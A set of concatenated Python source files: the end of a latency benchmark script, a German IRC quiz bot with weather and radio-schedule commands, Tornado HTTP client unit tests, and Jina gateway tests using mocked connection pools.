averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warmup_times: %d\n" % (client, loop, warmup))
resultfile.write("%s / %d requests finished in %.2f seconds\n" %(requestNum, (loop * client), (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
if requestNum > 0:
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main()
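# Illustrative usage (values are arbitrary): `python3 run.py 4 10 2` starts 4 concurrent clients,
# each looping the action 10 times, after 2 warm-up invocations per client.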
|
rtquizzer.py
|
#!/usr/bin/env python3
import asyncio
import re
from asyncirc import irc
from enum import IntEnum
import json
import asyncirc.plugins.addressed
import threading, time, os, re
import random
random = random.SystemRandom()
import urllib.parse
import requests
import sys
import collections
from datetime import date
from bs4 import BeautifulSoup
#supybot.ircutils (https://github.com/ProgVal/limnoria/tree/master/src/ircutils.py)
class ircutils(object):
def bold(s):
"""Returns the string s, bolded."""
return '\x02%s\x02' % s
def italic(s):
"""Returns the string s, italicised."""
return '\x1D%s\x1D' % s
# Definition of mircColors dictionary moved below because it became an IrcDict.
def mircColor(s, fg=None, bg=None):
"""Returns s with the appropriate mIRC color codes applied."""
if fg is None and bg is None:
return s
elif bg is None:
if str(fg) in mircColors:
fg = mircColors[str(fg)]
elif len(str(fg)) > 1:
fg = mircColors[str(fg)[:-1]]
else:
# Should not happen
pass
return '\x03%s%s\x03' % (fg.zfill(2), s)
elif fg is None:
bg = mircColors[str(bg)]
# According to the mirc color doc, a fg color MUST be specified if a
# background color is specified. So, we'll specify 00 (white) if the
# user doesn't specify one.
return '\x0300,%s%s\x03' % (bg.zfill(2), s)
else:
fg = mircColors[str(fg)]
bg = mircColors[str(bg)]
# No need to zfill fg because the comma delimits.
return '\x03%s,%s%s\x03' % (fg, bg.zfill(2), s)
def stripColor(s):
"""Returns the string s, with color removed."""
return _stripColorRe.sub('', s)
_stripColorRe = re.compile(r'\x03(?:\d{1,2},\d{1,2}|\d{1,2}|,\d{1,2}|)')
mircColors = {
'white': '0',
'black': '1',
'blue': '2',
'green': '3',
'red': '4',
'brown': '5',
'purple': '6',
'orange': '7',
'yellow': '8',
'light green': '9',
'teal': '10',
'light blue': '11',
'dark blue': '12',
'pink': '13',
'dark grey': '14',
'light grey': '15',
'dark gray': '14',
'light gray': '15',
}
# We'll map integers to their string form so mircColor is simpler.
for (k, v) in list(mircColors.items()):
if k is not None: # Ignore empty string for None.
sv = str(v)
mircColors[sv] = sv
mircColors[sv.zfill(2)] = sv
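# For example, ircutils.mircColor("hello", fg="red") returns '\x0304hello\x03':
# color code 4 (red), zero-padded to two digits and wrapped in \x03 markers.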
class State(IntEnum):
Question = 0
Tips = 1
Pause = 2
Answer = 3
class Quizbot(object):
quiz = None
test = None
event = None
questions = {}
current_question = []
current_category = ""
mode = State.Question
tips = 1
winner = None
points = {}
bot = None
channel = "#rt-quiz"
counter = 0
last = None
def __init__(self, bot):
self.bot = bot
self.event = threading.Event()
self.loadStats()
self.last = date.today()
self.quiz = threading.Thread(daemon=True, target=self.quizzing, args=())
self.quiz.start()
self.test = threading.Thread(daemon=True, target=self.checkForQuiz, args=())
def sleep(self, timeout : int):
self.event.wait(timeout)
self.event.clear()
def loadQuestions(self):
with open("questions.json", "r") as fobj:
self.questions = json.load(fobj)
def loadStats(self):
self.points = collections.defaultdict(lambda: 0)
self.daily = collections.defaultdict(lambda: 0)
if os.path.isfile("stats.json"):
with open("stats.json", "r") as fobj:
self.points.update(json.load(fobj))
if os.path.isfile("daily.json"):
with open("daily.json", "r") as fobj:
self.daily.update(json.load(fobj))
def reply(self, *args):
msg = "".join(ircutils.mircColor(i, 2, 0) for i in args)
self.bot.say(self.channel, msg)
def topic(self, *args):
topic = "".join(ircutils.mircColor(i, 2, 0) for i in args)
self.bot.writeln(f'TOPIC {self.channel} :{topic}')
def random(self, r : int):
return int(random.random() * r)
def checkForQuiz(self):
while True:
if not self.quiz.is_alive():
self.reply("Starte Quiz neu...")
del self.quiz
self.quiz = threading.Thread(daemon=True, target=self.quizzing, args=())
self.quiz.start()
self.sleep(60)
def quizzing(self):
while True:
if self.mode == State.Question:
self.loadQuestions()
self.winner = None
self.tips = 1
self.counter = 0
# [category, question, answer]
try:
self.current_question = random.choice(self.questions)
if not (self.current_question and len(self.current_question) >= 3 and self.validQuestion(self.current_question)):
continue
self.reply(f"Kategorie {ircutils.bold(self.current_question[0])}: {self.current_question[1]}")
l = len(self.current_question[2])
self.current_question.append(l * 2 if l < 80 else l)
if not self.random(10):
self.reply(ircutils.mircColor("ACHTUNG: Dies ist eine Superpunkterunde. Der Gewinner bekommt die dreifache Punktezahl!", 4, 1))
self.current_question[3] *= 3
self.mode = State.Tips
except Exception as e: # general ignore
self.reply(f"Frage konnte nicht geladen werden: {str(e)}")
self.sleep(4)
continue
elif self.mode == State.Tips:
if self.counter < 4:
self.counter += 1
self.sleep(5)
continue
self.reply("{}{}{}".format(ircutils.bold("Tipp: "), self.current_question[2][:self.tips], "." * (len(self.current_question[2]) - self.tips)))
self.tips += 1
if self.tips >= len(self.current_question[2]):
self.counter = 0
self.mode = State.Pause
self.sleep(4)
continue
elif self.mode == State.Pause:
if not self.counter:
self.reply(ircutils.mircColor("Achtung, wenn die Frage innerhalb von 30 Sekunden nicht beantwortet wird, werde ich automatisch eine neue Runde starten!", 3, 1))
if self.counter < 6:
self.counter += 1
self.sleep(5)
continue
else:
self.counter = 0
self.mode = State.Answer
elif self.mode == State.Answer:
if self.winner is not None:
x = re.match(r"(.*?).{1}onAir", self.winner, re.IGNORECASE)
if x:
self.winner = x[1]
aliases = {
"l-micha" : "lmichael",
"spunki" : "lmichael"
}
if self.winner in aliases:
self.winner = aliases[self.winner]
if self.winner not in self.points:
for k in self.points:
if k.lower() == self.winner.lower():
self.winner = k
try:
self.current_question[3] = int(self.current_question[3])
except ValueError:
self.current_question[3] = len(self.current_question[2])
self.points[self.winner] += self.current_question[3]
self.daily[self.winner] += self.current_question[3]
self.reply(f"{self.winner} hat die Antwort", ircutils.mircColor(" " + self.current_question[2] + " ", 7, 1), "korrekt erraten, dafür gibt es", ircutils.mircColor(" " + str(self.current_question[3]) + " ", 4, 1), "Punkte!")
else:
self.reply(f"Keiner hat die Antwort", ircutils.mircColor(" " + self.current_question[2] + " ", 7, 1), "korrekt erraten :(")
self.mode = State.Question
self.current_question = None
self.current_category = ""
with open("stats.json", "w") as fobj:
json.dump(dict(self.points), fobj)
with open("daily.json", "w") as fobj:
json.dump(dict(self.daily), fobj)
if date.today() - self.last:
self.last = date.today()
self.daily = collections.defaultdict(lambda: 0)
self.reply(ircutils.mircColor("-------------", 7, 1))
#self.reply(ircutils.mircColor("Nächste Frage in 20s!", 7, 1))
#self.reply(ircutils.mircColor("-------------", 7, 1))
#self.sleep(20)
self.sleep(5)
def validQuestion(self, q: list) -> bool:
for i in ["Tipp", "Top 10", "admin@ryobots.de", "Zeit ist vorbei"]:
if i in q:
return False
return True
quiz = None
def git():
cached = os.stat(__file__).st_mtime
while True:
os.system("git pull")
stamp = os.stat(__file__).st_mtime
if stamp != cached:
cached = stamp
print("Restarting")
os._exit(0)
time.sleep(300)
asyncirc.plugins.addressed.register_command_character("!")
bot = irc.connect("irc.euirc.net", 6667, use_ssl=False)
bot.register("RT-Quizzer", "RT-Quizzer", "RT-Quizzer", password="quizzer").join([Quizbot.channel, "#radio-thirty"])
@bot.on("irc-001")
def connected(par=None):
global quiz
quiz = Quizbot(bot)
threading.Thread(target=git, args=(), daemon=True).start()
bot.writeln(f"MODE {bot.nick} +B")
@bot.on("addressed")
def on_addressed(message, user, target, text):
global quiz
def say(target, text):
text = text.replace("\n", "").replace("\r", "")
while text:
bot._writeln(f"PRIVMSG {target} :{text[:400]}")
text = text[400:]
if target == "#radio-thirty":
aliases = {
re.compile("^wedda") : "wetter chieming",
re.compile("^weer") : "wetter 26197",
re.compile("^wetter f.rth") : "wetter fürth"
}
for regex, location in aliases.items():
text = regex.sub(location, text)
if text.startswith("wetter"):
cmd = text.split()
if len(cmd) < 2:
return
cmd[1] = cmd[1].lower().split(".")[0]
if cmd[1] == "moon" or cmd[1].startswith(":"):
return
r = requests.get(f"http://de.wttr.in/{urllib.parse.quote(cmd[1])}?Q0T")
for i, line in enumerate(r.text.splitlines()):
if i and i % 6 == 0:
time.sleep(2)
say(target, line)
elif text.startswith("sendeplan"):
page = BeautifulSoup(requests.get("http://radio-thirty.de/sendeplan_xl").text, "lxml")
emissions = []
started = False
current_emission = {}
for tr in page.tr.td.table.find_all("tr", recursive=False):
try:
emission = {
"time" : tr.td.table.tr.td.next_sibling.next_sibling.text.replace("°", "").replace("U", " U"),
"moderator" : tr.td.next_sibling.next_sibling.table.tr.td.next_sibling.next_sibling.text,
"title" : tr.td.next_sibling.next_sibling.table.tr.td.next_sibling.next_sibling.next_sibling.next_sibling.text
}
if emission["moderator"] == "":
started = False
if current_emission != {}:
emissions.append(current_emission.copy())
current_emission = {}
elif started:
if current_emission["moderator"] != emission["moderator"]:
emissions.append(current_emission.copy())
current_emission = emission
else:
current_emission["time"] = current_emission["time"].split("-")[0] + "-" + emission["time"].split("-")[1]
current_emission["title"] += emission["title"]
else:
started = True
current_emission = emission
except Exception:
continue
for emission in emissions:
say(target, f"{emission['title']} mit {emission['moderator']} von {emission['time']}")
if target != Quizbot.channel or not quiz:
return
if text in ["punkte", "tag"]:
for i, p in enumerate(sorted((quiz.daily if text == "tag" else quiz.points).items(), key=lambda x: x[1], reverse=True), start=1):
quiz.reply(f"{i}.\t{p[0]} ({p[1]})")
if i >= 10:
break
elif text == "anzahl":
quiz.reply(f"{len(quiz.questions)} Fragen")
elif text == "frage":
quiz.reply(f"Kategorie {ircutils.bold(quiz.current_question[0])}: {quiz.current_question[1]}")
current_category = ""
current_question = []
questions = {}
@bot.on("message")
def on_message(message, user, target, text):
if target == Quizbot.channel and quiz and quiz.current_question and not quiz.winner and text.lower() == quiz.current_question[2].lower():
quiz.winner = user.nick
quiz.mode = State.Answer
quiz.event.set()
@bot.on("connection-lost")
def on_disconnected(*args):
sys.exit(0)
asyncio.get_event_loop().run_forever()
|
httpclient_test.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
import base64
import binascii
from contextlib import closing
import functools
import sys
import threading
from tornado.escape import utf8
from tornado.httpclient import HTTPRequest, HTTPResponse, _RequestProxy, HTTPError, HTTPClient
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.log import gen_log
from tornado import netutil
from tornado.stack_context import ExceptionStackContext, NullContext
from tornado.testing import AsyncHTTPTestCase, bind_unused_port, gen_test, ExpectLog
from tornado.test.util import unittest
from tornado.util import u, bytes_type
from tornado.web import Application, RequestHandler, url
try:
from io import BytesIO # python 3
except ImportError:
from cStringIO import StringIO as BytesIO
class HelloWorldHandler(RequestHandler):
def get(self):
name = self.get_argument("name", "world")
self.set_header("Content-Type", "text/plain")
self.finish("Hello %s!" % name)
class PostHandler(RequestHandler):
def post(self):
self.finish("Post arg1: %s, arg2: %s" % (
self.get_argument("arg1"), self.get_argument("arg2")))
class ChunkHandler(RequestHandler):
def get(self):
self.write("asdf")
self.flush()
self.write("qwer")
class AuthHandler(RequestHandler):
def get(self):
self.finish(self.request.headers["Authorization"])
class CountdownHandler(RequestHandler):
def get(self, count):
count = int(count)
if count > 0:
self.redirect(self.reverse_url("countdown", count - 1))
else:
self.write("Zero")
class EchoPostHandler(RequestHandler):
def post(self):
self.write(self.request.body)
class UserAgentHandler(RequestHandler):
def get(self):
self.write(self.request.headers.get('User-Agent', 'User agent not set'))
class ContentLength304Handler(RequestHandler):
def get(self):
self.set_status(304)
self.set_header('Content-Length', 42)
def _clear_headers_for_304(self):
# Tornado strips content-length from 304 responses, but here we
# want to simulate servers that include the headers anyway.
pass
class AllMethodsHandler(RequestHandler):
SUPPORTED_METHODS = RequestHandler.SUPPORTED_METHODS + ('OTHER',)
def method(self):
self.write(self.request.method)
get = post = put = delete = options = patch = other = method
# These tests end up getting run redundantly: once here with the default
# HTTPClient implementation, and then again in each implementation's own
# test suite.
class HTTPClientCommonTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application([
url("/hello", HelloWorldHandler),
url("/post", PostHandler),
url("/chunk", ChunkHandler),
url("/auth", AuthHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/echopost", EchoPostHandler),
url("/user_agent", UserAgentHandler),
url("/304_with_content_length", ContentLength304Handler),
url("/all_methods", AllMethodsHandler),
], gzip=True)
def test_hello_world(self):
response = self.fetch("/hello")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["Content-Type"], "text/plain")
self.assertEqual(response.body, b"Hello world!")
self.assertEqual(int(response.request_time), 0)
response = self.fetch("/hello?name=Ben")
self.assertEqual(response.body, b"Hello Ben!")
def test_streaming_callback(self):
# streaming_callback is also tested in test_chunked
chunks = []
response = self.fetch("/hello",
streaming_callback=chunks.append)
# with streaming_callback, data goes to the callback and not response.body
self.assertEqual(chunks, [b"Hello world!"])
self.assertFalse(response.body)
def test_post(self):
response = self.fetch("/post", method="POST",
body="arg1=foo&arg2=bar")
self.assertEqual(response.code, 200)
self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_chunked(self):
response = self.fetch("/chunk")
self.assertEqual(response.body, b"asdfqwer")
chunks = []
response = self.fetch("/chunk",
streaming_callback=chunks.append)
self.assertEqual(chunks, [b"asdf", b"qwer"])
self.assertFalse(response.body)
def test_chunked_close(self):
# test case in which chunks spread read-callback processing
# over several ioloop iterations, but the connection is already closed.
sock, port = bind_unused_port()
with closing(sock):
def write_response(stream, request_data):
stream.write(b"""\
HTTP/1.1 200 OK
Transfer-Encoding: chunked
1
1
1
2
0
""".replace(b"\n", b"\r\n"), callback=stream.close)
def accept_callback(conn, address):
# fake an HTTP server using chunked encoding where the final chunks
# and connection close all happen at once
stream = IOStream(conn, io_loop=self.io_loop)
stream.read_until(b"\r\n\r\n",
functools.partial(write_response, stream))
netutil.add_accept_handler(sock, accept_callback, self.io_loop)
self.http_client.fetch("http://127.0.0.1:%d/" % port, self.stop)
resp = self.wait()
resp.rethrow()
self.assertEqual(resp.body, b"12")
self.io_loop.remove_handler(sock.fileno())
def test_streaming_stack_context(self):
chunks = []
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def streaming_cb(chunk):
chunks.append(chunk)
if chunk == b'qwer':
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', streaming_callback=streaming_cb)
self.assertEqual(chunks, [b'asdf', b'qwer'])
self.assertEqual(1, len(exc_info))
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_basic_auth(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_basic_auth_explicit_mode(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="basic").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_unsupported_auth_mode(self):
# curl and simple clients handle errors a bit differently; the
# important thing is that they don't fall back to basic auth
# on an unknown mode.
with ExpectLog(gen_log, "uncaught exception", required=False):
with self.assertRaises((ValueError, HTTPError)):
response = self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="asdf")
response.rethrow()
def test_follow_redirect(self):
response = self.fetch("/countdown/2", follow_redirects=False)
self.assertEqual(302, response.code)
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
response = self.fetch("/countdown/2")
self.assertEqual(200, response.code)
self.assertTrue(response.effective_url.endswith("/countdown/0"))
self.assertEqual(b"Zero", response.body)
def test_credentials_in_url(self):
url = self.get_url("/auth").replace("http://", "http://me:secret@")
self.http_client.fetch(url, self.stop)
response = self.wait()
self.assertEqual(b"Basic " + base64.b64encode(b"me:secret"),
response.body)
def test_body_encoding(self):
unicode_body = u("\xe9")
byte_body = binascii.a2b_hex(b"e9")
# unicode string in body gets converted to utf8
response = self.fetch("/echopost", method="POST", body=unicode_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "2")
self.assertEqual(response.body, utf8(unicode_body))
# byte strings pass through directly
response = self.fetch("/echopost", method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
# Mixing unicode in headers and byte string bodies shouldn't
# break anything
response = self.fetch("/echopost", method="POST", body=byte_body,
headers={"Content-Type": "application/blah"},
user_agent=u("foo"))
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
def test_types(self):
response = self.fetch("/hello")
self.assertEqual(type(response.body), bytes_type)
self.assertEqual(type(response.headers["Content-Type"]), str)
self.assertEqual(type(response.code), int)
self.assertEqual(type(response.effective_url), str)
def test_header_callback(self):
first_line = []
headers = {}
chunks = []
def header_callback(header_line):
if header_line.startswith('HTTP/'):
first_line.append(header_line)
elif header_line != '\r\n':
k, v = header_line.split(':', 1)
headers[k] = v.strip()
def streaming_callback(chunk):
# All header callbacks are run before any streaming callbacks,
# so the header data is available to process the data as it
# comes in.
self.assertEqual(headers['Content-Type'], 'text/html; charset=UTF-8')
chunks.append(chunk)
self.fetch('/chunk', header_callback=header_callback,
streaming_callback=streaming_callback)
self.assertEqual(len(first_line), 1)
self.assertRegexpMatches(first_line[0], 'HTTP/1.[01] 200 OK\r\n')
self.assertEqual(chunks, [b'asdf', b'qwer'])
def test_header_callback_stack_context(self):
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def header_callback(header_line):
if header_line.startswith('Content-Type:'):
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', header_callback=header_callback)
self.assertEqual(len(exc_info), 1)
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_configure_defaults(self):
defaults = dict(user_agent='TestDefaultUserAgent', allow_ipv6=False)
# Construct a new instance of the configured client class
client = self.http_client.__class__(self.io_loop, force_instance=True,
defaults=defaults)
client.fetch(self.get_url('/user_agent'), callback=self.stop)
response = self.wait()
self.assertEqual(response.body, b'TestDefaultUserAgent')
client.close()
def test_304_with_content_length(self):
# According to the spec 304 responses SHOULD NOT include
# Content-Length or other entity headers, but some servers do it
# anyway.
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.5
response = self.fetch('/304_with_content_length')
self.assertEqual(response.code, 304)
self.assertEqual(response.headers['Content-Length'], '42')
def test_final_callback_stack_context(self):
# The final callback should be run outside of the httpclient's
# stack_context. We want to ensure that there is not stack_context
# between the user's callback and the IOLoop, so monkey-patch
# IOLoop.handle_callback_exception and disable the test harness's
# context with a NullContext.
# Note that this does not apply to secondary callbacks (header
# and streaming_callback), as errors there must be seen as errors
# by the http client so it can clean up the connection.
exc_info = []
def handle_callback_exception(callback):
exc_info.append(sys.exc_info())
self.stop()
self.io_loop.handle_callback_exception = handle_callback_exception
with NullContext():
self.http_client.fetch(self.get_url('/hello'),
lambda response: 1 / 0)
self.wait()
self.assertEqual(exc_info[0][0], ZeroDivisionError)
@gen_test
def test_future_interface(self):
response = yield self.http_client.fetch(self.get_url('/hello'))
self.assertEqual(response.body, b'Hello world!')
@gen_test
def test_future_http_error(self):
try:
yield self.http_client.fetch(self.get_url('/notfound'))
except HTTPError as e:
self.assertEqual(e.code, 404)
self.assertEqual(e.response.code, 404)
@gen_test
def test_reuse_request_from_response(self):
# The response.request attribute should be an HTTPRequest, not
# a _RequestProxy.
# This test uses self.http_client.fetch because self.fetch calls
# self.get_url on the input unconditionally.
url = self.get_url('/hello')
response = yield self.http_client.fetch(url)
self.assertEqual(response.request.url, url)
self.assertTrue(isinstance(response.request, HTTPRequest))
response2 = yield self.http_client.fetch(response.request)
self.assertEqual(response2.body, b'Hello world!')
def test_all_methods(self):
for method in ['GET', 'DELETE', 'OPTIONS']:
response = self.fetch('/all_methods', method=method)
self.assertEqual(response.body, utf8(method))
for method in ['POST', 'PUT', 'PATCH']:
response = self.fetch('/all_methods', method=method, body=b'')
self.assertEqual(response.body, utf8(method))
response = self.fetch('/all_methods', method='HEAD')
self.assertEqual(response.body, b'')
response = self.fetch('/all_methods', method='OTHER',
allow_nonstandard_methods=True)
self.assertEqual(response.body, b'OTHER')
@gen_test
def test_body(self):
hello_url = self.get_url('/hello')
with self.assertRaises(AssertionError) as context:
yield self.http_client.fetch(hello_url, body='data')
self.assertTrue('must be empty' in str(context.exception))
with self.assertRaises(AssertionError) as context:
yield self.http_client.fetch(hello_url, method='POST')
self.assertTrue('must not be empty' in str(context.exception))
class RequestProxyTest(unittest.TestCase):
def test_request_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
user_agent='foo'),
dict())
self.assertEqual(proxy.user_agent, 'foo')
def test_default_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict(network_interface='foo'))
self.assertEqual(proxy.network_interface, 'foo')
def test_both_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
proxy_host='foo'),
dict(proxy_host='bar'))
self.assertEqual(proxy.proxy_host, 'foo')
def test_neither_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
self.assertIs(proxy.auth_username, None)
def test_bad_attribute(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
with self.assertRaises(AttributeError):
proxy.foo
def test_defaults_none(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'), None)
self.assertIs(proxy.auth_username, None)
class HTTPResponseTestCase(unittest.TestCase):
def test_str(self):
response = HTTPResponse(HTTPRequest('http://example.com'),
200, headers={}, buffer=BytesIO())
s = str(response)
self.assertTrue(s.startswith('HTTPResponse('))
self.assertIn('code=200', s)
class SyncHTTPClientTest(unittest.TestCase):
def setUp(self):
if IOLoop.configured_class().__name__ in ('TwistedIOLoop',
'AsyncIOMainLoop'):
# TwistedIOLoop only supports the global reactor, so we can't have
# separate IOLoops for client and server threads.
# AsyncIOMainLoop doesn't work with the default policy
# (although it could with some tweaks to this test and a
# policy that created loops for non-main threads).
raise unittest.SkipTest(
'Sync HTTPClient not compatible with TwistedIOLoop or '
'AsyncIOMainLoop')
self.server_ioloop = IOLoop()
sock, self.port = bind_unused_port()
app = Application([('/', HelloWorldHandler)])
self.server = HTTPServer(app, io_loop=self.server_ioloop)
self.server.add_socket(sock)
self.server_thread = threading.Thread(target=self.server_ioloop.start)
self.server_thread.start()
self.http_client = HTTPClient()
def tearDown(self):
def stop_server():
self.server.stop()
self.server_ioloop.stop()
self.server_ioloop.add_callback(stop_server)
self.server_thread.join()
self.http_client.close()
self.server_ioloop.close(all_fds=True)
def get_url(self, path):
return 'http://localhost:%d%s' % (self.port, path)
def test_sync_client(self):
response = self.http_client.fetch(self.get_url('/'))
self.assertEqual(b'Hello world!', response.body)
def test_sync_client_error(self):
# Synchronous HTTPClient raises errors directly; no need for
# response.rethrow()
with self.assertRaises(HTTPError) as assertion:
self.http_client.fetch(self.get_url('/notfound'))
self.assertEqual(assertion.exception.code, 404)
class HTTPRequestTestCase(unittest.TestCase):
def test_headers(self):
request = HTTPRequest('http://example.com', headers={'foo': 'bar'})
self.assertEqual(request.headers, {'foo': 'bar'})
def test_headers_setter(self):
request = HTTPRequest('http://example.com')
request.headers = {'bar': 'baz'}
self.assertEqual(request.headers, {'bar': 'baz'})
def test_null_headers_setter(self):
request = HTTPRequest('http://example.com')
request.headers = None
self.assertEqual(request.headers, {})
def test_body(self):
request = HTTPRequest('http://example.com', body='foo')
self.assertEqual(request.body, utf8('foo'))
def test_body_setter(self):
request = HTTPRequest('http://example.com')
request.body = 'foo'
self.assertEqual(request.body, utf8('foo'))
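# These tests are normally collected by Tornado's own test runner; assuming this module is
# importable as tornado.test.httpclient_test, it can be run with:
#   python -m tornado.testing tornado.test.httpclient_test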
|
test_clients_gateways.py
|
import asyncio
import copy
import multiprocessing
import time
from typing import Dict
import pytest
from jina import Document, DocumentArray
from jina.helper import random_port
from jina.parsers import set_gateway_parser
from jina.serve import networking
from jina.serve.runtimes.gateway.grpc import GRPCGatewayRuntime
from jina.serve.runtimes.gateway.http import HTTPGatewayRuntime
from jina.serve.runtimes.gateway.websocket import WebSocketGatewayRuntime
from jina.types.request.data import DataRequest
@pytest.fixture
def linear_graph_dict():
return {
'start-gateway': ['deployment0'],
'deployment0': ['deployment1'],
'deployment1': ['deployment2'],
'deployment2': ['deployment3'],
'deployment3': ['end-gateway'],
}
@pytest.fixture
def bifurcation_graph_dict():
return {
'start-gateway': ['deployment0', 'deployment4', 'deployment6'],
'deployment0': ['deployment1', 'deployment2'],
'deployment1': [], # hanging_deployment
'deployment2': ['deployment3'],
'deployment4': ['deployment5'],
'deployment5': ['end-gateway'],
'deployment3': ['deployment5'],
'deployment6': [], # hanging_deployment
}
@pytest.fixture
def merge_graph_dict_directly_merge_in_gateway():
return {
'start-gateway': ['deployment0'],
'deployment0': ['deployment1', 'deployment2'],
'deployment1': ['merger'],
'deployment2': ['merger'],
'merger': ['end-gateway'],
}
@pytest.fixture
def merge_graph_dict_directly_merge_in_last_deployment():
return {
'start-gateway': ['deployment0'],
'deployment0': ['deployment1', 'deployment2'],
'deployment1': ['merger'],
'deployment2': ['merger'],
'merger': ['deployment_last'],
'deployment_last': ['end-gateway'],
}
@pytest.fixture
def complete_graph_dict():
return {
'start-gateway': ['deployment0', 'deployment4', 'deployment6'],
'deployment0': ['deployment1', 'deployment2'],
'deployment1': ['merger'],
'deployment2': ['deployment3'],
'deployment4': ['deployment5'],
'merger': ['deployment_last'],
'deployment5': ['merger'],
'deployment3': ['merger'],
'deployment6': [], # hanging_deployment
'deployment_last': ['end-gateway'],
}
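# DummyNoDocAccessMockConnectionPool forwards each request without ever touching its docs,
# so the lazy-access test further below can count how often DataRequest._decompress really runs.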
class DummyNoDocAccessMockConnectionPool:
def send_requests_once(
self, requests, deployment: str, head: bool, endpoint: str = None
) -> asyncio.Task:
async def task_wrapper():
import random
await asyncio.sleep(1 / (random.randint(1, 3) * 10))
if requests[0].is_decompressed:
return (
DataRequest(request=requests[0].proto.SerializePartialToString()),
{},
)
else:
return DataRequest(request=requests[0].buffer), {}
return asyncio.create_task(task_wrapper())
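# DummyMockConnectionPool appends "-client<id>-<deployment>" to every doc's text as it passes
# through, so the tests below can assert the exact path a request took through the graph.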
class DummyMockConnectionPool:
def send_requests_once(
self, requests, deployment: str, head: bool, endpoint: str = None
) -> asyncio.Task:
assert head
request = requests[0]
response_msg = copy.deepcopy(request)
new_docs = DocumentArray()
docs = request.docs
for doc in docs:
clientid = doc.text[0:7]
new_doc = Document(id=doc.id, text=doc.text + f'-{clientid}-{deployment}')
new_docs.append(new_doc)
response_msg.data.docs = new_docs
async def task_wrapper():
import random
await asyncio.sleep(1 / (random.randint(1, 3) * 10))
return response_msg, {}
return asyncio.create_task(task_wrapper())
def create_runtime(
graph_dict: Dict, protocol: str, port: int, call_counts=None, monkeypatch=None
):
import json
graph_description = json.dumps(graph_dict)
runtime_cls = None
if call_counts:
def decompress(self):
call_counts.put_nowait('called')
from jina.proto import jina_pb2
self._pb_body = jina_pb2.DataRequestProto()
self._pb_body.ParseFromString(self.buffer)
self.buffer = None
monkeypatch.setattr(
DataRequest,
'_decompress',
decompress,
)
if protocol == 'grpc':
runtime_cls = GRPCGatewayRuntime
elif protocol == 'http':
runtime_cls = HTTPGatewayRuntime
elif protocol == 'websocket':
runtime_cls = WebSocketGatewayRuntime
with runtime_cls(
set_gateway_parser().parse_args(
[
'--port',
f'{port}',
'--graph-description',
f'{graph_description}',
'--deployments-addresses',
'{}',
]
)
) as runtime:
runtime.run_forever()
def client_send(client_id: int, port: int, protocol: str):
from jina.clients import Client
c = Client(protocol=protocol, port=port, return_responses=True)
# send requests
return c.post(
on='/', inputs=DocumentArray([Document(text=f'client{client_id}-Request')])
)
NUM_PARALLEL_CLIENTS = 10
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_linear(
linear_graph_dict, monkeypatch, protocol
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
assert (
responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment1-client{client_id}-deployment2-client{client_id}-deployment3'
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': linear_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
